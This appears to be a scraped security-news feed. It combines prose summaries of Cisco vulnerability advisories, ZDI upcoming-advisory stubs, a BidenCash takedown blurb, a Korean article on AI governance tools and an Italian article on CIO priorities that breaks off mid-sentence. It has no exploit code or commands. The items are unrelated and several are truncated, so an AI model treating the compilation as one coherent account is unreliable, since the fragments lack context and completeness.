A vulnerability in the web-based management interface of Cisco Unified Intelligent Contact Management Enterprise could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco plans to release software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-icm-xss-cfcqhXAg Security Impact Rating: Medium CVE: CVE-2025-20273

A vulnerability in the API of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to upload files to an affected device. This vulnerability is due to improper validation of the file copy function. An attacker could exploit this vulnerability by sending a crafted file upload request to a specific API endpoint. A successful exploit could allow the attacker to upload arbitrary files to an affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-file-upload-P4M8vwXY Security Impact Rating: Medium CVE: CVE-2025-20130

A vulnerability in the SSH implementation of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an unauthenticated, remote attacker to impersonate Cisco NDFC-managed devices. This vulnerability is due to insufficient SSH host key validation. An attacker could exploit this vulnerability by performing a machine-in-the-middle attack on SSH connections to Cisco NDFC-managed devices, which could allow an attacker to intercept this traffic. A successful exploit could allow the attacker to impersonate a managed device and capture user credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ndfc-shkv-snQJtjrp Security Impact Rating: High CVE: CVE-2025-20163

Multiple vulnerabilities in the update process of Cisco ThousandEyes Endpoint Agent for Windows could allow an authenticated, local attacker to delete arbitrary files on an affected device. These vulnerabilities are due to improper access controls on files that are in the local file system. An attacker could exploit these vulnerabilities by using a symbolic link to perform an agent upgrade that redirects the delete operation of any protected file. A successful exploit could allow the attacker to delete arbitrary files from the file system of the affected device. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-endagent-filewrt-zNcDqNRJ Security Impact Rating: Medium CVE: CVE-2025-20259

A vulnerability in the file opening process of Cisco Unified Contact Center Express (Unified CCX) Editor could allow an unauthenticated attacker to execute arbitrary code on an affected device.  This vulnerability is due to insecure deserialization of Java objects by the affected software. An attacker could exploit this vulnerability by persuading an authenticated, local user to open a crafted .aef file. A successful exploit could allow the attacker to execute arbitrary code on the host that is running the editor application with the privileges of the user who launched it. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-editor-rce-ezyYZte8 Security Impact Rating: Medium CVE: CVE-2025-20275

Multiple vulnerabilities in the web-based management interface of Cisco Unified Contact Center Express (Unified CCX) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack or execute arbitrary code on an affected device. To exploit these vulnerabilities, the attacker must have valid administrative credentials. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-multi-UhOTvPGL Security Impact Rating: Medium CVE: CVE-2025-20276,CVE-2025-20277,CVE-2025-20279

A vulnerability in the SSH connection handling of Cisco Integrated Management Controller (IMC) for Cisco UCS B-Series, UCS C-Series, UCS S-Series, and UCS X-Series Servers could allow an authenticated, remote attacker to access internal services with elevated privileges. This vulnerability is due to insufficient restrictions on access to internal services. An attacker with a valid user account could exploit this vulnerability by using crafted syntax when connecting to the Cisco IMC of an affected device through SSH. A successful exploit could allow the attacker to access internal services with elevated privileges, which may allow unauthorized modifications to the system, including the possibility of creating new administrator accounts on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability, but a mitigation is available. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-ssh-priv-esc-2mZDtdjM Security Impact Rating: High CVE: CVE-2025-20261

A vulnerability in the CLI of multiple Cisco Unified Communications products could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user. This vulnerability is due to improper validation of user-supplied command arguments. An attacker could exploit this vulnerability by executing crafted commands on the CLI of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user. To exploit this vulnerability, the attacker must have valid administrative credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vos-command-inject-65s2UCYy Security Impact Rating: Medium CVE: CVE-2025-20278

A vulnerability in the web-based chat interface of Cisco Customer Collaboration Platform (CCP), formerly Cisco SocialMiner, could allow an unauthenticated, remote attacker to persuade users to disclose sensitive data. This vulnerability is due to improper sanitization of HTTP requests that are sent to the web-based chat interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the chat interface of a targeted user on a vulnerable server. A successful exploit could allow the attacker to redirect chat traffic to a server that is under their control, resulting in sensitive information being redirected to the attacker. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccp-info-disc-ZyGerQpd Security Impact Rating: Medium CVE: CVE-2025-20129

U.S. and Dutch authorities took down 145 domains tied to the BidenCash cybercrime marketplace in a coordinated law enforcement operation. The US DoJ announced the seizure of approximately 145 darknet and clear web domains, and cryptocurrency funds associated with the BidenCash marketplace. “The U.S. Attorney’s Office for the Eastern District of Virginia announced today the […]

Cisco has released security patches to address a critical security flaw impacting the Identity Services Engine (ISE) that, if successfully exploited, could allow unauthenticated actors to carry out malicious actions on susceptible systems. The security defect, tracked as CVE-2025-20286, carries a CVSS score of 9.9 out of 10.0. It has been described as a static credential vulnerability. "A...

프린시펄 파이낸셜 그룹(Principal Financial Group, PFG)은 지난 몇 년 동안 AI 활용이 급증하면서 이를 종합적으로 관리할 수 있는 AI 거버넌스 전략과 이를 실행할 도구가 절실해졌다. PFG의 부사장 겸 최고 데이터 및 분석 책임자인 라제시 아로라는 “현재 자연어 처리, 머신러닝, 생성형 AI 모델 등 100건 이상의 AI 사용례를 운영 중이며, 이를 통해 사기 탐지, 보험금 청구 자동화, 투자 리서치, 퇴직연금 최적화, 고객센터 지원 업무를 수행하고 있다”고 설명했다. 아로라는 “그러나 각각의 사용례는 규제 준수, 편향, 윤리 문제와 같은 리스크를 동반하고 있으며, 이를 해결하기 위해 AI 거버넌스 전략이 필요하다”고 강조했다. PFG는 먼저 AI 도입부터 리스크 분류, 모델 검증, 지속적인 모니터링에 이르는 전 생애 주기를 관리하는 ‘윤리적이고 책임 있는 AI(Ethical and Responsible AI, ERAI)’ 프레임워크를 개발했다. 이 프레임워크는 모든 AI 애플리케이션에 설명 가능성, 인간의 감독, 개인정보 보호를 필수 요건으로 설정했다. 이어 AI 거버넌스 플랫폼인 크레도 AI(Credo AI)를 도입해 모든 AI 애플리케이션을 인벤토리화하고, 리스크 평가, 데이터 프라이버시, 규정 준수 추적, AI 규제 및 표준과의 일치를 지원하도록 했다. 아로라는 “서비스나우 기반 거버넌스 워크플로우도 일부 시범 운영 중”이라고 덧붙였다. 가트너의 부사장이자 수석 애널리스트인 아비바 리탄은 “AI가 유발하는 리스크는 매우 현실적”이라며, “특히 생성형 AI의 경우 데이터 유출, 손상, 부정확하고 원치 않는 결과물로 인해 잘못된 의사결정이 내려질 가능성이 크다”고 경고했다. EY의 책임감 있는 AI 리더인 신클레어 슐러는 “AI 거버넌스는 모든 비즈니스에 반드시 필요한 핵심 과제”라며, “거버넌스 실패는 기업 자체의 실패로 이어질 수 있다”고 강조했다. 이처럼 문제를 해결해야 할 필요성은 분명하지만, 실제 도입 속도는 그 긴박성에 비해 더디게 진행되고 있다. 느린 도입 곡선 가트너는 2025년 전략적 기술 트렌드 가운데 두 번째로 AI 거버넌스 플랫폼을 꼽았다. 이런 도구를 활용하는 기업은 AI 관련 윤리 이슈가 40%가량 줄어들 것으로 예상하고 있다. 그러나 여전히 AI 거버넌스 플랫폼은 널리 사용되지 않고 있으며, 이는 플랫폼이 기술적으로 미성숙해서가 아니라는 것이 리탄의 설명이다. 리탄은 “CIO는 AI의 ROI도 입증하기 어려운 상황에서 또 다른 플랫폼에 투자하려 들지 않는다”고 지적했다. 지금까지 보안 및 리스크 관리는 항상 후순위였다. 예를 들어, 웨브스터 뱅크의 부사장이자 CIO인 비크람 나프데는 이미 생성형 AI를 문서 처리, 비정형 데이터 관리, 동료 간 신용 평가 등 다양한 비즈니스 프로세스에 적용하고 있지만, 아직 별도의 AI 거버넌스 플랫폼은 도입하지 않았다. 대신 나프데는 AI 활용에 대한 내부 거버넌스 가이드라인을 수립하고 공식적인 AI 사용 정책을 마련했으며, AI 설계 및 구현, 운영 전반에 책임과 전략 방향을 제시할 AI 거버넌스 위원회를 신설했다. 나프데는 “현재 우리는 지라, 셰어포인트, 서비스나우 같은 기존 엔터프라이즈 도구를 활용해 워크플로우, 통제, 증적 관리 등의 AI 거버넌스 요소를 관리하고 있다”고 설명했다. 또 “이와 동시에 전체 AI 거버넌스 생애 주기를 포괄하고, 내부 리스크, 법무, 데이터, 보안 도메인과 통합 가능한 단일 플랫폼도 검토 중”이라고 밝혔다. 리탄은 AI가 자율적으로 의사결정을 내리는 ‘에이전틱 AI’ 기술이 확산되면서 AI 거버넌스 플랫폼 도입이 가속화될 것이라고 전망했다. 리탄은 “에이전틱 AI는 예측 불가능하고 언제든 통제 불능 상태에 빠질 수 있기 때문에 반드시 제어 장치가 필요하다”고 강조했다. 현재 많은 기업이 수동 검토와 정책을 통해 AI를 통제하고 있지만, 향후 2년 안에 자율 에이전트가 본격 확산되면 수동 방식으로는 속도를 따라잡을 수 없다는 것이다. 리탄은 “지금은 과대광고가 많고 실제 도입은 적다”며, “생산성 정점(Gartner가 말하는 대중화 시점)에 도달하려면 몇 년은 더 걸릴 것”이라고 전망했다. AI 거버넌스 도구 현황 AI 비즈니스 전략 컨설팅 전문업체 닥터 리사 AI(Dr. Lisa AI)의 CEO 겸 최고 AI 책임자인 리사 파머는 “AI 거버넌스 플랫폼은 CIO가 모델 성능을 모니터링하고, 편향을 탐지하며, 정책을 집행하고, 컴플라이언스 검토를 간소화하는 데 도움을 줄 수 있다”라고 설명했다. 파머는 CIO 자문 가이드 ‘모든 CIO/CAIO가 반드시 책임져야 할 5가지 전략적 AI 거버넌스 과제’에서 “이 도구는 모델 내 편향과 공정성 문제를 탐지하고, 특성 기여도와 히트맵 같은 설명 가능성 기능을 제공하며, 모델 성능, 드리프트, 규정 준수 상태를 실시간으로 모니터링할 수 있다”라고 분석했다. 파머는 “피들러, 트루에라, 크레도 AI 같은 도구는 설명 가능성의 공백을 드러내고 데이터 계보를 추적하며, 실제 운영 환경에서 모델이 기대한 대로 작동하는지 확인할 수 있다”라고 설명했다. 이어 “하지만 인간의 판단을 대체하거나 비즈니스 가치를 정의하거나 AI 사용례를 전략적 우선순위에 자동으로 맞추는 기능은 제공하지 않는다”고 덧붙였다. 리탄은 현재 AI 거버넌스 플랫폼 시장에 30~40개 업체가 진출해 있다고 추정했다. 그러나 “채택률이 낮아 고객 사례를 찾기 어렵고, 이것이 가트너가 아직 주요 업체와 후발주자를 구분한 매직 쿼드런트를 발표하지 않은 이유 중 하나”라고 설명했다. 다만 리탄은 “일부 업체는 AI 거버넌스의 특정 영역에서 강점을 보이고 있다”고 덧붙였다. 예를 들어, 제니티(Zenity)는 마이크로소프트 365 코파일럿 같은 제품 모니터링에 강하고, 크레이니엄(Cranium)은 서드파티 리스크 관리, 노마 시큐리티(Noma Security)는 인프라 및 런타임 위반 탐지, 홀리스틱(Holistic)은 편향 테스트에서 우수한 성능을 보인다고 평가했다. 슐러는 “AI 거버넌스 도구는 챗GPT나 앤트로픽 같은 서드파티 AI 이용 정책 수립과 집행뿐 아니라, 내부 AI 자산 설계 및 개발 정책 수립에도 도움이 된다”라며, “이런 도구는 활용 정책을 기술하고 정책 집행을 지원할 수 있다”라고 설명했다. 도입 전 준비 단계 AI 거버넌스 도구를 평가하기 전에 CIO는 먼저 AI 애플리케이션 목록을 작성하고 정책 프레임워크를 수립해야 한다. 파머는 “도구가 해결해야 할 문제는 무엇이며, 거버넌스 결과에 대한 책임자는 누구인지, 어떤 정책과 워크플로우, 임계값이 존재하거나 마련되어야 하는지를 명확히 해야 한다”라며, “이런 기준이 없으면 아무리 뛰어난 도구라도 기대 이하의 결과를 낼 수 있다”고 지적했다. 이어 “CIO는 먼저 자사의 활용 사례를 식별하고, 리스크 등급을 평가해야 한다. 초기 단계 조직은 MLOps 플랫폼이 유용하고, 성숙한 조직은 정책 집행 계층이나 편향 자동 감사 기능이 필요하다”고 조언했다. 리탄은 “우선 체계를 잡아야 한다”고 강조하며, “AI 책임성에 대한 정책을 정의하고 모든 AI를 파악하며, 누가 어떤 도구를 어떻게 사용하고 있으며, 얼마나 위험한지를 정확히 이해해야 한다. 이후 데이터를 정비해야 한다. 권한과 분류 상태가 적절한지, 그리고 보안이 철저한지 확실히 해야 한다”라고 설명했다. AI 거버넌스 도구에서 확인해야할 요소 파머는 도구를 평가할 때 모델 설명 가능성, 편향 탐지, 정책 자동화 및 규칙 기반 규정 준수 트리거, 실시간 성능 모니터링, 감사 가능성과 규제 감사를 위한 문서화, 기존 모델 개발 생애 주기와의 통합 여부 등을 주요 기능으로 꼽았다. 슐러는 “솔루션 업체와 논의할 수 있는 평가 기준을 사전에 마련하고, 자사 거버넌스 모델의 미래 모습이 어떤지 구체적으로 설정해야 한다”며 “해당 플랫폼이 이를 구현하지 못하면 후보에서 제외해야 한다”라고 강조했다. 또한 “모든 프로젝트에 적용되는 거버넌스 정책을 정의하고, 이 정책을 상속받는 하위 정책을 만들 수 있는 기능이 있는 플랫폼을 선택하라”고 조언했다. 나프데도 “이 기능은 여러 사업 부문이나 도메인 전반에 걸쳐 대규모 거버넌스를 관리할 때 매우 강력하다”라며, “기본 정책을 유지하면서도 상황에 맞게 조정할 수 있는 능력이 혁신을 저해하지 않으면서도 조직적 일치를 이루는 핵심 요소”라고 분석했다. 슐러는 “정책 승인에는 여전히 사람의 개입이 필요하다”라며, “중간 점검 단계에서 정책 승인 여부를 결정해야 한다. 결국 AI 거버넌스는 사람이 수행하는 일”이라고 강조했다. 파머는 도구 평가 시 통합 수준, 다양한 역할에 걸친 사용성, 모델 및 규제 변화에 따른 플랫폼의 적응력을 고려해야 한다고 설명했다. 또 “AI 거버넌스는 법무, 컴플라이언스, 비즈니스 이해관계자가 모두 연관되어 있어 도구에 대한 부서 간 접근성이 특히 중요하다”라고 덧붙였다. 아로라는 PFG가 도구를 선택할 때 사용성과 맞춤화, 확장성은 물론, 거버넌스 전략 변화에 맞춰 도구가 진화할 수 있는지도 중요하게 평가했다고 설명했다. 또한 “도구의 기능성, 성능, TCO도 주요 기준이었다”라고 밝혔다. 하지만 아로라는 평가 과정에서 조직 특화 AI 애플리케이션처럼 주관적 판단이 필요한 경우, 많은 도구가 한계를 보였다고 전했다. 그는 “도구 학습과 운영화에 시간이 많이 걸리고, 기존 시스템과의 통합도 간단하지 않다. 또한 데이터 품질, 정확성, 완전성 같은 기본적인 문제를 해결하지 못하는 경우도 많았다”고 지적했다. 통제할 수 있는 AI를 위해 해야 할 일 AI 거버넌스 플랫폼이 있으면 좋지만, 구매를 서두를 필요는 없다. 나프데는 “먼저 자사의 거버넌스 프레임워크와 프로세스를 정의해야 한다”라며, “AI 활용 범위와 관련 리스크를 명확히 파악한 후, 이를 바탕으로 도구를 선택해야 한다”라고 강조했다. 그리고 솔루션 업체가 기꺼이 가격 협상을 한다고 해서 놀랄 필요는 없다. 리탄은 “AI 거버넌스는 솔루션 업체가 가격을 깎아줄 수 있을 정도로 초기 시장이다. 하지만 문제는 거버넌스 도구 구매 비용이 아니라 시간, 자원, 인력 측면의 비용이다. “기업 인력이 이미 부족한 상황이라 거버넌스를 누가 관리할지도 불분명하다”라고 지적했다. 파머는 “AI 거버넌스 도구가 모니터링에는 도움이 되지만, CIO는 여전히 비즈니스 관점에서 수용 가능한 리스크를 정의하고 AI 프로젝트를 전략적 성과와 맞추고, 전사적 거버넌스 전략을 수립해야 한다”고 조언했다. 그리고 “이런 플랫폼은 사용자를 대신해 거버넌스 전략을 정의해주지 않으며, 대부분 AI 기반 대중 여론 조작, 조직적인 대량 항의, 평판 조작과 같은 외부 위협은 다루지 못한다. 이는 CIO가 간과해서는 안 될 사각지대”라고 경고했다. 실제 운영을 시작한 후에는 정책을 지나치게 엄격하게 설정하지 않는 것이 좋다. 쉴러는 “AI는 창의력 엔진”이라며, “이를 통제할 필요는 있지만, 너무 억제하면 창의성을 발휘할 수 없게 된다”라고 설명했다. 아로라는 “AI 거버넌스 플랫폼이 할 수 있는 일에는 한계가 있다”라며, “산업 차원에서 책임 있는 AI와 보안 정책이 아직 성숙하지 않고 명확히 정의되어 있지 않기 때문에, 이로 인해 거버넌스 도구의 효과가 제한될 수 있다”고 분석했다. 또 “이런 기반이 부족하면 거버넌스 도구는 제 기능을 다 하지 못한다. AI 거버넌스를 단순한 규정 준수 요건이 아니라 비즈니스 역량으로 바라봐야 한다”라며, “조직 구조에 맞게 유연하게 적용되면서도 일관된 기준을 강력하게 집행할 수 있는 도구를 선택”하라고 조언했다. AI 분야는 매우 빠르게 변화하고 있으므로, 플랫폼을 도입한 이후에는 정기적인 리뷰가 필수적이다. 슐러는 “정책을 수정해야 하는 시점을 놓치지 않도록 한 달 또는 분기 단위의 아주 짧은 검토 주기를 유지할 것”을 제안했다.dl-ciokorea@foundryco.com

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Gary Kwong' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 9.4 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'whs3-detonator' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Nir Ohfeld (@nirohfeld), Shir Tamari (@shirtamari)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Adam Babis' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Benny Isaacs, Nir Brakha, Sagi Tzadik (@sagitz_)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-37099.

I CIO di oggi stanno cercando di guidare una nuova ondata di trasformazione armati di intelligenza artificiale, AI generativa e ora anche di agenti AI.“Se dovessi citare i progetti più importanti che i CIO stanno portando avanti oggi, è chiaro che l’agenda è definita da una sola parola: reinvenzione”, osserva Tejas Patel, responsabile della strategia tecnologica e della consulenza per l’APAC per la società di servizi professionali Accenture.Naturalmente, questa trasformazione e questo processo di reinvenzione prevedono molti passaggi che comprendono una combinazione di pilastri IT e obiettivi aziendali, come dimostra l’elenco dei progetti prioritari dei CIO.Di seguito analizziamo le aree strategiche e le iniziative su cui i leader della tecnologia in azienda intendono concentrarsi quest’anno, sulla base dei dati del sondaggio “2025 State of the CIO” condotto da CIO.com [in inglese], di ulteriori risultati di ricerca, dei CIO e di altri leader aziendali. 1. La trasformazione aziendale La trasformazione rimane l’impegno principale per molti CIO, poiché sempre più leader IT abbandonano l’idea dei “progetti hi-tech” e passano, invece, a strategie [in inglese] che utilizzano la tecnologia per reinventare il business.“Per dirla tutta, il termine ‘progetto IT’ sembra anche un po’ obsoleto”, afferma Trevor Schulze, Chief Digital and Information Officer dell’azienda di software Alteryx. “Ciò che stiamo portando avanti sono soprattutto gli sforzi di trasformazione aziendale che avvengono grazie alla tecnologia. Nell’era dell’intelligenza artificiale, i CIO non si possono limitare a fornire soluzioni, ma devono contribuire a scrivere il manuale su come le aziende devono competere e crescere”.I dati del rapporto “2025 State of Digital Transformation” di TEKsystems [in inglese] confermano tali affermazioni, almeno per quanto riguarda le aziende lungimiranti. La ricerca ha rilevato, infatti, che la trasformazione digitale [in inglese] è un pilastro fondamentale per l’85% delle aziende identificate come leader digitali, rispetto al 44% di quelle identificate come “ritardatarie”.La digital transformation è anche al centro dell’attenzione di Dennis Hodges, CIO di Inteva Products [in inglese], fornitore globale di componenti e sistemi ingegnerizzati per il settore automobilistico.“La mia priorità assoluta è la trasformazione digitale in tutta l’azienda, con l’obiettivo di gestire meglio le funzioni operative attraverso sistemi di gestione semplificati e unificati”, afferma. “Ciò include il business maturity modeling, il miglioramento dei processi e l’RPA per potenziare i metodi operativi attuali, la revisione dell’intero portafoglio di applicazioni per migliorare l’integrazione e la funzionalità e l’AI per trasformare l’intera area dei processi”. 2. Creazione di valore I CIO sono anche fortemente concentrati su iniziative che creano valore per le loro imprese, sia attraverso progetti di automazione per aumentare la produttività, sia attraverso iniziative di generazione di ricavi basate sull’intelligenza artificiale, sottolinea Mark Taylor, CEO della Society for Information Management (SIM), un’associazione professionale senza fini di lucro.Il sondaggio 2025 State of the CIO di CIO.com [in inglese] lo sottolinea, osservando che “la spesa tecnologica nel 2025 sarà destinata a iniziative aziendali più strategiche volte alla crescita dei ricavi e alla fidelizzazione dei clienti. La monetizzazione dei dati aziendali [in inglese] è stata la priorità assoluta per il 38% degli intervistati nel 2025, seguita dal miglioramento della customer experience [in inglese] (35%) e dallo sviluppo di nuovi flussi di ricavi digitali [in inglese] (32%)”.La società di ricerca Gartner ha identificato una tendenza simile nel suo rapporto “2025 CIO Leadership Perspective” [in inglese], affermando che “quest’anno i CIO segnalano che l’aumento dei ricavi è una delle loro priorità principali in tutta l’azienda, dimostrando che la tecnologia è un fattore chiave per la crescita dei ricavi”. 3. AI di grande impatto Questa mentalità orientata alla creazione di valore sta anche influenzando le iniziative di intelligenza artificiale che i CIO stanno promuovendo [in inglese], poiché i responsabili IT collaborano con i colleghi del business per identificare le opportunità in cui l’AI “può fare la differenza”.“Quest’anno, una delle nostre priorità principali è scalare l’intelligenza artificiale in tutta l’azienda, non solo in modo frammentario o con progetti pilota, ma in modo da fare la differenza”, dice Schulze di Alteryx, aggiungendo che questo obiettivo sta plasmando il lavoro svolto dal suo team. “Ci stiamo concentrando sulla creazione di una solida piattaforma di servizi di IA per questo scopo. Pipeline di dati governate e di alta qualità, un’infrastruttura adeguata per supportare un’intelligenza artificiale responsabile e modelli linguistici di grandi dimensioni su misura per casi d’uso aziendali reali’. Come molti CIO, Schulze sta passando “dalla sperimentazione dell’IA alla sua reale implementazione”.“Le nostre aree di interesse includono l’automazione delle funzioni di supporto (interne ed esterne), il miglioramento dell’analisi del percorso dei clienti e l’integrazione dell’intelligenza nei sistemi GTM interni”, commenta. “Il motore del business è la velocità: ridurre il tempo che intercorre tra l’intuizione e l’azione”. 4. La sicurezza dell’AI I CIO stanno abbinando progetti di intelligenza artificiale di grande impatto a iniziative che rafforzano sia la sicurezza che la governance delle loro capacità.Schulze, per esempio, lo indica come una delle finalità principali della sua azienda, sottolineando come conosca altri manager con ruoli omologhi al suo che, similmente, li hanno inseriti nella loro lista delle cose da fare.“Sento molti colleghi alle prese con le difficoltà relative allo scalare l’AI in modo sicuro, soprattutto per quanto riguarda la trasparenza dei modelli, la provenienza dei dati e la proliferazione dei fornitori”, precisa Schulze. “Stiamo affrontando la governance dell’intelligenza artificiale nello stesso modo in cui abbiamo affrontato la SOX [Sarbanes-Oxley] [in inglese] ai tempi: non aggiungerla in un secondo momento, ma integrarla fin dall’inizio e renderla parte integrante del funzionamento dell’intera azienda”.Patel di Accenture offre osservazioni simili, spiegando che l’AI introduce nuove modalità di attacco [in inglese], per esempio attraverso possibilità di model poisoning [in inglese], e crea anche nuovi rischi, come le hallucination.I CIO devono quindi intervenire per affrontarli, aggiunge.“L’AI è la nuova frontiera della sicurezza e i Chief Information Officer stanno integrando il rilevamento delle minacce nei modelli e rafforzando i controlli su come la tecnologia viene addestrata, governata e implementata. L’enfasi è sulla protezione del livello di intelligence prima che gli aggressori lo prendano di mira”, afferma.Tuttavia, esistono delle difficoltà. Patel sottolinea che gli strumenti di sicurezza non si sono ancora adattati allo stack dell’AI (modelli, agenti, API) e che manca una governance unificata tra intelligenza artificiale, dati, cloud e sicurezza. 5. La sicurezza aziendale L’attenzione alla governance e alla sicurezza dell’AI si integra con il più ampio lavoro di security aziendale che i CIO conducono ormai da molti anni.I manager tecnologici di tutti i settori e di tutti i livelli di maturità digitale hanno indicato in interviste, sondaggi e rapporti che il rafforzamento della sicurezza della loro impresa continua a essere in cima alle loro agende, oggi come in passato.Per esempio, la ricerca di TEKsystems ha rilevato che il rafforzamento della sicurezza informatica è uno dei 10 obiettivi principali dei leader digitali per il 2025, mentre il sondaggio State of the CIO di CIO.com ha rilevato che il rispetto dei requisiti di conformità è stata la seconda iniziativa aziendale in ordine di importanza citata dai CIO per il 2025, e che l’aumento delle protezioni di sicurezza informatica è stata la seconda 